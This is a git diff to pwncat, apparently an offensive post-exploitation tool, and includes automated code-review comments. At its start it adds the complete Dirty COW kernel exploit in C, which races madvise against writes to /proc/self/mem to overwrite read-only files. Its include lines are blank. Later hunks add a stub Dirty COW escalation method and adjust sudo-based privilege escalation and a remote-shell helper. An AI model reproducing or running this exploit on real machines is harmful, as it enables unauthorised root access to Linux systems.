diff --git a/data/dirtycow/vulncheck.c b/data/dirtycow/vulncheck.c new file mode 100644 index 0000000..2aca9d5 --- /dev/null +++ b/data/dirtycow/vulncheck.c @@ -0,0 +1,9 @@ +#include +#include +#include +#include +#include +#include +#include +#include +void*map;int f;struct stat st;char*name;void*madviseThread(void*arg){char*str;str=(char*)arg;int i,c=0;for(i=0;i<100000000;i++){c+=madvise(map,100,MADV_DONTNEED);}printf("madvise%d\n\n",c);}void*procselfmemThread(void*arg){char*str;str=(char*)arg;int f=open("/proc/self/mem",O_RDWR);int i,c=0;for(i=0;i<100000000;i++){lseek(f,(uintptr_t)map,SEEK_SET);c+=write(f,str,strlen(str));}printf("procselfmem%d\n\n",c);}int main(int argc,char*argv[]){if(argc<3){(void)fprintf(stderr,"%s\n","usage: dirtyc0w target_file new_content");return 1;}pthread_t pth1,pth2;f=open(argv[1],O_RDONLY);fstat(f,&st);name=argv[1];map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);printf("mmap%zx\n\n",(uintptr_t)map);pthread_create(&pth1,NULL,madviseThread,argv[1]);pthread_create(&pth2,NULL,procselfmemThread,argv[2]);pthread_join(pth1,NULL);pthread_join(pth2,NULL);return 0;} \ No newline at end of file diff --git a/pwncat/privesc/dirtycow.py b/pwncat/privesc/dirtycow.py new file mode 100644 index 0000000..00600c1 --- /dev/null +++ b/pwncat/privesc/dirtycow.py 
@@ -0,0 +1,43 @@
+#!/usr/bin/env python3
+
+from typing import Generator, List
+import shlex
+import sys
+from time import sleep
+import os
+from colorama import Fore, Style
+import socket
+from io import StringIO, BytesIO
+import functools
+
+from pwncat.util import CTRL_C
+from pwncat.privesc.base import Method, PrivescError, Technique
+from pwncat.file import RemoteBinaryPipe
+
+from pwncat.pysudoers import Sudoers
+from pwncat import gtfobins
+from pwncat.privesc import Capability
+from pwncat import util
+
+
+class DirtycowMethod(Method):
+
+ name = "dirtycow"
+ BINARIES = ["gcc"]
+
+ def __init__(self, pty: "pwncat.pty.PtyHandler"):
+ super(DirtycowMethod, self).__init__(pty)
+
+ def enumerate(self, capability: int = Capability.ALL) -> List[Technique]:
+ """ Find all techniques known at this time """
+
+ # Test if this kernel version is vulnerable to dirtycow
+
+ return NotImplemented("this function is not yet written")
+
+ def execute(self, technique: Technique):
+ """ Run the specified technique """
+
+ # actually perform dirtycow
+
+ return NotImplemented("this function is not yet written")
diff --git a/pwncat/privesc/sudo.py b/pwncat/privesc/sudo.py
index 0a4eeef..6fd8fb9 100644
--- a/pwncat/privesc/sudo.py
+++ b/pwncat/privesc/sudo.py
@@ -138,14 +138,6 @@ class SudoMethod(Method):
 tag = " ".join(tags_split[1:])
 command = commands["command"]
 
- # success(
- # f"user {Fore.GREEN}{current_user['name']}{Fore.RESET} can run "
- # + f"{Fore.YELLOW}{command}{Fore.RESET} "
- # + f"as user {Fore.BLUE}{run_as_user}{Fore.RESET} "
- # + f"with {Fore.BLUE}{tag}{Fore.RESET}",
- # overlay=True,
- # )
-
 if "NOPASSWD" in tag:
 sudo_no_password.append(
 {
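Review bot: Both stub bodies in `enumerate` and `execute` call `NotImplemented(...)`, but `NotImplemented` is a constant rather than an exception class or a callable, so the first caller gets `TypeError: 'NotImplementedType' object is not callable` instead of a clear not-implemented signal; replace both with `raise NotImplementedError("this function is not yet written")`. That also keeps `enumerate` consistent with its `-> List[Technique]` annotation, which the current return value violates. The module also imports a long list of names it never uses (`Generator`, `shlex`, `sys`, `sleep`, `os`, `Fore`/`Style`, `socket`, `StringIO`/`BytesIO`, `functools`, `CTRL_C`, `PrivescError`, `RemoteBinaryPipe`, `Sudoers`, `gtfobins`, `util`); trimming them would make the method's real dependencies obvious to the next reader.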
@@ -181,9 +173,7 @@ class SudoMethod(Method):
 # The PtyHandler.which method is used to verify the presence of
 # different GTFObins on the remote system when an "ALL" spec is
 # found.
- # sudo_privesc["command"], binary = gtfobins.Binary.find_sudo(
- # sudo_privesc["command"], self.pty.which
- # )
+
 binaries = gtfobins.Binary.find_sudo(
 sudo_privesc["command"], self.pty.which, capability
 )
diff --git a/pwncat/pty.py b/pwncat/pty.py
index b0c679e..d5e450e 100644
--- a/pwncat/pty.py
+++ b/pwncat/pty.py
@@ -791,7 +791,6 @@ class PtyHandler:
 """ Reset the remote terminal (calls sync, reset, and sets PS1) """
 self.reset()
 self.do_sync([])
- print(self.id())
 
 def run(self, cmd, wait=True, input: bytes = b"") -> bytes:
 """ Run a command in the context of the remote host and return the
@@ -985,9 +984,9 @@ class PtyHandler:
 
 @property
 def id(self):
- id_output = self.run("id")
+ id_output = self.run("id").decode("utf-8")
 
- pieces = id_output.split(" ").decode("utf-8")
+ pieces = id_output.split(" ")
 props = {}
 for p in pieces:
 segments = p.split("=")
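Review bot: The new `.decode("utf-8")` on the output of `self.run("id")` in the `id` property is a strict decode, so any non-UTF-8 byte in the remote response (a locale-encoded user or group name, or stray terminal bytes) raises `UnicodeDecodeError` out of the property instead of yielding a string to parse; `id_output = self.run("id").decode("utf-8", errors="replace")` keeps the property usable on such hosts. The text being parsed comes from the remote host and is not guaranteed to be well-formed, so the per-piece `p.split("=")` that follows should also tolerate a piece without `=` — the rest of the property is outside this hunk, so I cannot confirm how `segments` is indexed. A one-line comment on the changed line, such as `# run() returns bytes; decode once before any text parsing`, would record why the decode belongs here rather than on the split result.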